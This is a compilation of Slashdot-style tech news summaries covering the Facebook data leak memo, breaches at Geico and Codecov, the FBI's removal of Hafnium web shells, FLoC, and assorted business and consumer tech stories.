Facebook wants you to believe that the scraping of 533 million people's personal data from its platform, and the dumping of that data online by nefarious people, is something to be "normalised." The Register: A blundering Facebook public relations operative managed to send a journalist a copy of an internal document detailing the social network's strategy for containing the leaking of 533 million accounts -- and what the memo contained was infuriating though unsurprising. Belgian tech journalist Pieterjan van Leemputten asked the Mark Zuckerberg-owned company some questions about the theft and dumping online of account data earlier this month.

Miscreants had helped themselves to 70GB of names, phone numbers, dates of birth, email addresses, and more from people's Facebook profiles, thanks to a security weakness in the platform. Having stolen the data in 2019, crims bought and sold it among themselves before one shared it via a Tor-hidden site in early April, inviting anyone to come and help themselves to it all. Yet when van Leemputten asked Facebook's mouthpieces to respond, what he got in return was quite unexpected. As he told The Register: "Facebook accidentally sent me an internal email where they literally state that they will frame the recent 533 million data leak as a 'broad industry issue' and that they want to normalize this." The memo added, "To do this, the team is proposing a follow-up post in the next several weeks that talks more broadly about our anti-scraping work and provides more transparency around the amount of work we're doing in this area."

Now that Apple's lost item finder AirTag has officially been introduced, competitor Tile is going on record ahead of its testimony in front of Congress tomorrow about how it perceives Apple's latest product. In a statement, Tile CEO CJ Prober said today: "Our mission is to solve the everyday pain point of finding lost and misplaced things and we are flattered to see Apple, one of the most valuable companies in the world, enter and validate the category Tile pioneered. The reason so many people turn to Tile to locate their lost or misplaced items is because of the differentiated value we offer our consumers. In addition to providing an industry leading set of features via our app that works with iOS and Android devices, our service is seamlessly integrated with all major voice assistants, including Alexa and Google. And with form factors for every use case and many different styles at affordable prices, there is a Tile for everyone.

Tile has also successfully partnered with top brands like HP, Intel, Skullcandy and fitbit to enable our finding technology in mass market consumer categories like laptops, earbuds and wearables. With over 30 partners, we look forward to extending the benefits of Tile to millions of customers and enabling an experience that helps you keep track of all your important belongings. We welcome competition, as long as it is fair competition. Unfortunately, given Apple's well-documented history of using its platform advantage to unfairly limit competition for its products, we're skeptical. And given our prior history with Apple, we think it is entirely appropriate for Congress to take a closer look at Apple's business practices specific to its entry into this category. We welcome the opportunity to discuss these issues further in front of Congress tomorrow.

Geico, the second-largest auto insurer in the U.S., has fixed a security bug that let fraudsters steal customers' driver's license numbers from its website. From a report: In a data breach notice filed with the California attorney general's office, Geico said information gathered from other sources was used to "obtain unauthorized access to your driver's license number through the online sales system on our website." The insurance giant did not say how many customers were affected by the breach but said the fraudsters accessed customer driver's license numbers between January 21 and March 1. Companies are required to alert the state's attorney general's office when more than 500 state residents are affected by a security incident. Geico said it had "reason to believe that this information could be used to fraudulently apply for unemployment benefits in your name." Many financially driven criminals target government agencies using stolen identities or data. But many U.S. states require a government ID -- like a driver's license -- to file for unemployment benefits. To get a driver's license number, fraudsters take public or previously breached data and exploit weaknesses in auto insurance websites to obtain a customer's driver's license number. That allows the fraudsters to obtain unemployment benefits in another person's name.

The White House unveiled on Tuesday a 100-day plan intended to protect the U.S. power grid from cyber-attacks, mainly by creating a stronger relationship between U.S. national security agencies and the mostly private utilities that run the electrical system. From a report: The plan is among the first big steps toward fulfilling the Biden administration's promise to urgently improve the country's cyber defenses. The nation's power system is both highly vulnerable to hacking and a target for nation-state adversaries looking to counter the U.S. advantage in conventional military and economic power. "The United States faces a well-documented and increasing cyber threat from malicious actors seeking to disrupt the electricity Americans rely on to power our homes and businesses," Secretary of Energy Jennifer Granholm said. Although the plan is billed as a 100-day sprint -- which includes a series of consultations between utilities and the government -- it will likely take years to fully implement, experts say. It will ask utilities to pay for and install technology to better detect hacks of the specialized computers that run the country's power systems, known as industrial control systems. The Edison Electric Institute, the trade group that represents all U.S. investor-owned electric companies, praised the White House plan and the Biden administration's focus on cybersecurity. "Given the sophisticated and constantly changing threats posed by adversaries, America's electric companies remain focused on securing the industrial control systems that operate the North American energy grid," said EEI president Tom Kuhn.

AmiMoJo writes: WordPress announced over the weekend that they plan on treating Google's new FLoC tracking technology as a security concern and hence block it by default on WordPress sites. For some time, browsers have begun to increasingly block third-party browser cookies used by advertisers for interest-based advertising. In response, Google introduced a new ad tracking technology called Federated Learning of Cohorts, or FLoC, that uses a web browser to anonymously place users into interest or behavioral buckets based on how they browse the web. After Google began testing FLoC this month in Google Chrome, there has been a consensus among privacy advocates that Google's FLoC implementation just replaces one privacy risk with another one.

"WordPress powers approximately 41% of the web -- and this community can help combat racism, sexism, anti-LGBTQ+ discrimination and discrimination against those with mental illness with four lines of code," says WordPress. WordPress states that this code is planned for WordPress 5.8, scheduled for release in July 2021. As FLoC is expected to roll out sooner, WordPress is considering back-porting this code to earlier versions to "amplify the impact" on current versions of the blogging platform. Further reading: Nobody is Flying To Join Google's FLoC.

As online identity management grows in importance, Mastercard swooped in this morning and bought identity verification company Ekata for $850 million. From a report: Mastercard certainly sees the rapid digital transformation that is happening in online commerce, a move that was accelerated by COVID. It's a transformation that once started isn't likely to change back to the old ways of doing business, even when we get past the pandemic. With Ekata, the company gets a solution that can verify the online identity of a person making the transaction in real time using various signals that can indicate if this is fraudulent or true as they open an account or transact business. The company provides a score and other data that predicts the likelihood this person is who they say they are. It's not unlike a credit risk score, except for identity. That was one of the primary reasons Mastercard decided to acquire Ekata, according to Ajay Bhalla, president of cyber and intelligence solutions at the company. "With the addition of Ekata, we will advance our identity capabilities and create a safer, seamless way for consumers to prove who they say they are in the new digital economy," Bhalla said in a statement.

Long-time Slashdot reader xiando shares news from LinuxReviews: Linux Kernel Runtime Guard (LKRG) is a security module for the Linux kernel developed by Openwall. The latest release adds compatibility with Linux kernels up to soon to be released 5.12, support for building LKRG into kernel images, support for old 32-bit x86 machines and more...

The Linux Kernel Runtime Guard is an out-of-tree kernel module you can install as a kernel module, or, with the 0.9.0 release, build into your Linux kernel. It does run-time integrity checks to detect security vulnerability exploits against the Linux kernel.
An Openwall developer also notes in the announcement that "During LKRG development and testing I've found 7 Linux kernel bugs, 4 of them have CVE numbers."

In 2018 Oracle's Larry Ellison bought the historic Cal Neva Lodge on the scenic north shore of California's Lake Tahoe for $36 million. Then in 2019 Mark Zuckerberg bought a $59 million compound on Lake Tahoe's west shore.

But now a wave of techies are moving in, reports Outside magazine, "freed by COVID from cubicles and work commutes. They migrated, laptops in tow, to mountain towns all over the West, transforming them into modern-day boomtowns: 'Zoom-towns.'" "It's the wildest time," says realtor Katey Brandenburg, who works on Tahoe's Nevada side. For her and other realtors around the lake, the autumn of 2020 felt like winning the lottery. "I paid off a lifetime of debt — 28 years of loans, college, credit cards, and cars — in three months."

All told, 2020 saw more than 2,350 homes sold across the Tahoe Basin, for a boggling $3.28 billion, up from $1.76 billion in 2019, according to data analyzed by Sierra Sotheby's. That $3 billion stat is on a par with 2020 home-sales revenues in Aspen, Colorado (albeit there, the latest average home-sale price came in at $11 million). The trend is in line with real estate records being shattered from Sun Valley, Idaho, to Stowe, Vermont. And according to a just-released market update, it hasn't stopped: in the first quarter of 2021, median prices for single-family homes increased by an astronomical 70 percent year over year in Truckee, 72 percent in South Lake, and 81 percent in Incline Village...

"A disproportionate number of people who purchased homes in Tahoe in 2020 are employees of some of the largest tech companies in the Bay Area," says Deniz Kahramaner, founder of Atlasa, a real estate brokerage firm that specializes in data analytics. Of the 2,280 new-home buyers Atlasa identified throughout the Tahoe region in 2020, roughly 30 percent worked at software companies. The top three employers were Google (54 buyers), Apple (46), and Facebook (34)...

There is, however, one glaring issue with all this rapid, high-priced growth: the people who actually make a mountain town run — the ski instructors and patrollers, lift operators and shuttle drivers, housekeepers and snowcat mechanics, cooks and servers — can no longer afford to live there.
The article does note higher property taxes going toward public services (along with "more money eventually pumping into bars and restaurants.") And it also acknowledges affordable housing has for decades been an issue in tourist towns.

"It's just suddenly on steroids..."

America's top law enforcement agency "obtained a court order that allowed it to remove a backdoor program from hundreds of private Microsoft Exchange servers that were hacked through zero-day vulnerabilities earlier this year," reports CSO. (Thanks to detritus. (Slashdot reader #46,421) for sharing the news...) Earlier this week, the Department of Justice announced that the FBI was granted a search and seizure warrant by a Texas court that allows the agency to copy and remove web shells from hundreds of on-premise Microsoft Exchange servers owned by private organizations. A web shell is a type of program that hackers install on hacked web servers to grant them backdoor access and remote command execution capabilities on those servers through a web-based interface.

In this case, the warrant targeted web shells installed by a cyberespionage group dubbed Hafnium that is believed to have ties to the Chinese government. In early March, Microsoft reported that Hafnium has been exploiting previously unpatched vulnerabilities in Microsoft Exchange to compromise servers. At the same time, the company released patches for those vulnerabilities, as well as indicators of compromise and other detection tools, but this didn't prevent other groups of attackers from exploiting the vulnerabilities after they became public. In its warrant application, dated April 13, the FBI argues that despite the public awareness campaigns by Microsoft, CISA and the FBI itself, many servers remained infected with the web shell deployed by Hafnium. While the exact number has been redacted from the unsealed warrant, the DOJ said in a press release that it was "hundreds."

The FBI asked for, and received court approval, to access the malicious web shells through the passwords set by the original attackers and then use that access against the malware itself by executing a command that will delete the web shell, which is essentially an .aspx script deployed on the server. The FBI was also allowed to make a copy of the web shells first because they could constitute evidence.

The warrant states that it "does not authorize the seizure of any tangible property" or the copying or alteration of any content from the servers aside from the web shell themselves, which are identified in the warrant by their unique file paths. This means the FBI was not granted permission to patch the vulnerabilities to protect the servers from future exploitation or to remove any additional malware or tools that hackers might have already deployed...

The FBI sent an email message from an official email account, including a copy of the warrant, to the email addresses associated with the domain names of the infected servers.
An official statement from the Department of Justice is already using the past tense, announcing that U.S. authorities "have executed a court-authorized operation to copy and remove malicious web shells from hundreds of vulnerable computers in the United States. They were running on-premises versions of Microsoft Exchange Server software used to provide enterprise-level email service."

wiredmikey shares a report from SecurityWeek: Security response professionals are scrambling to measure the fallout from a software supply chain compromise of Codecov Bash Uploader that went undetected since January and exposed sensitive secrets like tokens, keys and credentials from organizations around the world. The hack occurred four months ago but was only discovered in the wild by a Codecov customer on the morning of April 1, 2021, the company said. Codecov is considered the vendor of choice for measuring code coverage in the tech industry. The company's tools help developers understand and measure lines of codes executed by a test suite and is widely deployed in big tech development pipelines. The company claims that more than 29,000 enterprises use its code coverage insights to check code quality and maintain code coverage. Codecov did not say how many customers were impacted or had data stolen in the incident.

According to Codecov, the altered version of the Bash Uploader script could potentially affect:
- Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.
- Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.
- The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.

The Google Project Zero security team has updated its vulnerability disclosure guidelines to add a cushion of 30 days to some security bug disclosures, so end-users have enough time to patch software and prevent attackers from weaponizing bugs. From a report: This week's changes are of particular importance because a large part of the cybersecurity community has adopted Project Zero's rules as the unofficial methodology for disclosing a security bug to software vendors and then to the general public. Prior to today, Google Project Zero researchers would give software vendors 90 days to fix a security bug. When the bug was patched, or at the end of the 90 days time window, Google researchers would publish details about the bug online (on their bug tracker). Starting this week, Project Zero says it will wait 30 days before publishing any details about the bug. The reasoning behind the extra time window is to allow users of the affected products time to update their software, an operation that can usually take days or weeks in some complex corporate networks.

A mystery photo and a geography enthusiast helped locate a missing California hiker who is now safely back home. From a report: Rene Compean of Palmdale was on a hike Monday near Mount Waterman, a popular ski destination in the San Gabriel Mountains in Southern California. While the 45-year-old was on his outdoor adventure, he snapped a picture. Compean texted the shot to a friend. And then, he went off the map. He was reported missing at 6 p.m. by a friend, who received one last text from Compean saying he was worried he was lost and his cell phone battery was running low. The photo was turned over to investigators at the Los Angeles County Sheriff's Department who posted it to social media, asking if anyone recognized the spot in the photograph. Benjamin Kuo saw the message and thought he might be able to help. The report adds: As a satellite image aficionado, he was already familiar with tracking California wildfires in remote areas. "I've got a very weird hobby, which is I love taking a look at photos and figuring out where they're taken," Kuo told NBC Los Angeles. Using satellite images, maps and the scenery below Compean's feet in the photo, Kuo was able to estimate the coordinates of where he believed the man had gone missing. Kuo sent his tip to the sheriff's office, and a helicopter was sent to survey the area Tuesday. There, as if by magic, was Compean.

Google is all alone with its proposed advertising technology -- FLoC-- to replace third-party cookies. Every major browser that uses the open source Chromium project has declined to use it, and it's unclear what that will mean for the future of advertising on the web. Firefox, Safari, Microsoft Edge, Vivaldi, and Brave have said they are not implementing Google's FLoC into their browsers.

The Internet of Secure Things Alliance, an IoT security certification body (a.k.a. ioXt), has launched a new security certification for mobile apps and VPNs. From a report: The new ioXt compliance program includes a 'mobile application profile' -- a set of security-related criteria against which apps can be certified. The profile or mobile app assessment includes additional requirements for virtual private network (VPN) applications. Google and Amazon had a hand in shaping the criteria, along with number of certified labs such as NCC Group and Dekra, and mobile app security testing vendors such as NowSecure. Google's VPN within the Google One service is one of the first to be certified against the criteria. Mobile app makers can get their apps certified against a set of security and privacy requirements. The ioXt Alliance has a broad cross-section of members from the tech industry, with its board comprising execs from Amazon, Comcast, Facebook, Google, Legrand, Resideo, Schneider Electric, T-Mobile, the Zigbee Alliance, and the Z-Wave Alliance. About 20 industry figures helped write the requirements for the mobile app profile, including Amit Agrawal, a principal security architect at Amazon, and Brooke Davis from the Strategic Partnerships team at Google Play. Both are vice-chairs of the mobile app profile group.

An anonymous reader writes: Charles Schwab is suing one of its former customers after the retail brokerage allegedly sent more than $1.2 million to an account of the Louisiana woman and then could not get the money back. Schwab meant to send $82.56 to Kelyn Spadoni's Fidelity Brokerage Services account in February, but a computer glitch caused it to erroneously transfer more than $1.2 million, according to the lawsuit. Schwab tried to get the money back, but repeated calls and texts to Spadoni, who lives in a suburb of New Orleans, were not returned, the brokerage said in the lawsuit. "We are fully cooperating with authorities in an effort to resolve this issue," Schwab said in a statement on Tuesday. Fidelity declined comment. After receiving the money in her account, Spadoni transferred a quarter of the money to another account, after which she bought a house and a car using the funds, Jefferson Parish Sheriff's Office spokesman Captain Jason Rivarde said in an interview on Tuesday. "Obviously you are not planning to give the money back if you spent it," he said. When Spadoni signed up with Schwab in January, the agreement she signed included a section that said any overpayment of funds must be returned, said the lawsuit, filed March 30.

Google Earth has partnered with NASA, the U.S. Geological Survey, the EU's Copernicus Climate Change Service, and Carnegie Mellon University's CREATE Lab to bring users time-lapse images of the planet's surface -- 24 million satellite photos taken over 37 years. Together they offer photographic evidence of a planet changing faster than at any time in millennia. Shorelines creep in. Cities blossom. Trees fall. Water reservoirs shrink. Glaciers melt and fracture. From a report: "We can objectively see global warming with our own eyes," said Rebecca Moore, director of Google Earth. "We hope that this can ground everyone in an objective, common understanding of what's actually happening on the planet, and inspire action." Timelapse, the name of the new Google Earth feature, is the largest video on the planet, according to a statement from the company, requiring 2 million hours to process in cloud computers, and the equivalent of 530,000 high-resolution videos. The tool stitches together nearly 50 years of imagery from the U.S.'s Landsat program, which is run by NASA and the USGS. When combined with images from complementary European Sentinel-2 satellites, Landsat provides the equivalent of complete coverage of the Earth's surface every two days. Google Earth is expected to update Timelapse about once a year.

Dell has announced the long-expected spinoff of VMware, the computing virtualization company it has majority-owned since it bought then-owner EMC Corp. in 2016. From a report: The computing giant said it will spin off its 81% equity ownership in VMware, creating two standalone companies when the move is completed in the fourth quarter of this year. That timing depends on conditions such as a favorable Internal Revenue Service opinion that the transaction qualifies for tax-free status for Dell shareholders. The idea is to simplify the companies' capital structures, since arguably investors have valued both companies' stocks lower than they might have because of the uncertainties related to the complex capital structures. Dell's shares rose about 9% in after-hours trading, while VMware's shares rose about 1.6% in late trading. Under the spinoff, which Dell had signaled last year, VMware will distribute a cash dividend of about $11.5 billion to $12 billion to shareholders, which of course include publicly held Dell itself. Chairman and Chief Executive Michael Dell, along with financial partner Silver Lake Partners, own 60% of Dell shares. Dell will get $9.3 billion to $9.7 billion of that dividend, which the company said will help it get more investment-grade ratings and enable it to pay down debt it has gradually been reducing since buying EMC.

Google today announced that it is moving FeedBurner to a new infrastructure but also deprecating its email subscription service. From a report: If you're an internet user of a certain age, chances are you used Google's FeedBurner to manage the RSS feeds of your personal blogs and early podcasts at some point. During the Web 2.0 era, it was the de facto standard for feed management and analytics, after all. Founded in 2004, with Dick Costolo as one of its co-founders (before he became Twitter's CEO in 2010), it was acquired by Google in 2007. Ever since, FeedBurner lingered in an odd kind of limbo. While Google had no qualms shutting down popular services like Google Reader in favor of its ill-fated social experiments like Google+, FeedBurner just kept burning feeds day in and day out, even as Google slowly deprecated some parts of the service, most notably its advertising integrations. [...] But in July, it is also shutting down some non-core features that don't directly involve feed management, most importantly the FeedBurner email subscription service that allowed you to get emailed alerts when a feed updates. Feed owners will be able to download their email subscriber lists (and will be able to do so after July, too).

Parallels today announced the release of Parallels Desktop 16.5 for Mac with full support for M1 Macs, allowing for the Windows 10 ARM Insider Preview and ARM-based Linux distributions to be run in a virtual machine at native speeds on M1 Macs. From a report: Parallels says running a Windows 10 ARM Insider Preview virtual machine natively on an M1 Mac results in up to 30 percent better performance compared to a 2019 model 15-inch MacBook Pro with an Intel Core i9 processor, 32GB of RAM, and Radeon Pro Vega 20 graphics. Parallels also indicates that on an M1 Mac, Parallels Desktop 16.5 uses 2.5x less energy than on the latest Intel-based MacBook Air. Microsoft does not yet offer a retail version of ARM-based Windows, with the Windows 10 ARM Insider Preview available on Microsoft's website for Windows Insider program members. The ability to run macOS Big Sur in a virtual machine is a feature that Parallels hopes to add support for in Parallels Desktop later this year as well.

The Swedish government dropped today its investigation into the 2017 hack of its sports authority, citing legal constraints that would have prevented prosecutors from charging the Russian hackers responsible for the intrusion, which officials claimed were mere pawns operating on behalf of a "foreign power." From a report: This marks the first time that such a legal clause is cited by prosecutors investigating cyber-espionage hacking groups. Today's statement from the Swedish Prosecution Authority also marks the first time that Swedish officials formally blamed the Russian government for the 2017 hack of the Swedish Sports Confederation (SSC). Citing a recently-concluded investigation from the Swedish Security Service, which also involved foreign intelligence services, Swedish prosecutors said that one of Russia's military hacker groups breached its sports body between December 2017 and May 2018 and stole medical records for Swedish athletes.